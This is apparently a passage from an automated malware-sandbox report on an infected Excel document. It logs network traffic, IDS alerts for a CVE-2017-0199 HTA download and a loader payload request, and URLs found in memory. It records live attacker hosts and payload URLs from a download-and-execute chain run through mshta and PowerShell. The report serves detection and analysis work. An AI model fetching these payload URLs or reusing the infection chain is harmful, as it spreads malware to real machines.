      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166

      Networking

      Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49167 -> 172.245.123.29:80
      Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 172.245.123.29:80 -> 192.168.2.22:49166
      Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1Host: 3105.filemail.comConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 193.30.119.205 193.30.119.205
      Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
      Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 172.245.123.29:80
      Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficHTTP traffic detected: GET /G5dF?&rank=uttermost&fan=decorous&barracks=drunk&kettledrum=flippant&banana=loose&bathroom HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ljg.clConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /G5dF?&rank=uttermost&fan=decorous&barracks=drunk&kettledrum=flippant&banana=loose&bathroom HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ljg.clConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /1343/erg/seemebestthings.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.29Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /1343/erg/seemebestthings.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 172.245.123.29If-Range: "320bd-627df8e9c34e4"
      Source: global trafficHTTP traffic detected: GET /1343/seemebestthingswithentirethingswithgreatnaturethings.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.29Connection: Keep-Alive
      Source: unknownHTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.22:49168 version: TLS 1.0
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE89997018 URLDownloadToFileW,8_2_000007FE89997018
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E2E61FF1.emf
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
      Source: global trafficDNS traffic detected: DNS query: ljg.cl
      Source: global trafficDNS traffic detected: DNS query: 3105.filemail.com
      Source: mshta.exe, 00000004.00000003.500943602.0000000004433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.0000000004433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.0000000004433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.0000000004433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.29/
      Source: mshta.exe, 00000004.00000003.500300099.0000000000423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.29/1343/erg/seemebestthings.hta
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.29/1343/erg/seemebestthings.hta...A
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.29/1343/erg/seemebestthings.htab
      Source: mshta.exe, 00000004.00000003.500717687.0000000003515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.29/1343/erg/seemebestthings.htahttp://172.245.123.29/1343/erg/seemebestthings.hta
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.29/1343/erg/seemebestthings.htai
      Source: mshta.exe, 00000004.00000002.501048315.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501030236.000000000037E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.29/1343/erg/seemebestthings.htarracks=drunk&kettledrum=flippant&banana=loose&bath
      Source: mshta.exe, 00000004.00000002.501048315.00000000003E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500300099.00000000003E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.29/1343/erg/seemebestthings.htas=drunk&kettledrum=flippant&
      Source: powershell.exe, 00000008.00000002.519013010.0000000002F2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.29/1343/seeme
      Source: powershell.exe, 00000008.00000002.519013010.0000000002F2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIF
      Source: powershell.exe, 00000008.00000002.528531884.000000001AA9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIFGf
      Source: powershell.exe, 00000008.00000002.528531884.000000001AA9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIFHf
      Source: powershell.exe, 00000008.00000002.519013010.0000000002F2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIFp
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C22F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2B4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536446147.000000001AC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
      Source: powershell.exe, 0000000F.00000002.536446147.000000001AD05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrz
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528531884.000000001AABE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536446147.000000001ACEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
      Source: powershell.exe, 0000000F.00000002.536446147.000000001AC84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.cr
      Source: powershell.exe, 00000008.00000002.519013010.0000000002953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
      Source: powershell.exe, 00000008.00000002.528236429.0000000012461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2B4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536446147.000000001AC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536446147.000000001AD05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
      Source: powershell.exe, 00000008.00000002.519013010.0000000002431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.538964399.000000000240B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.533779674.00000000023C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
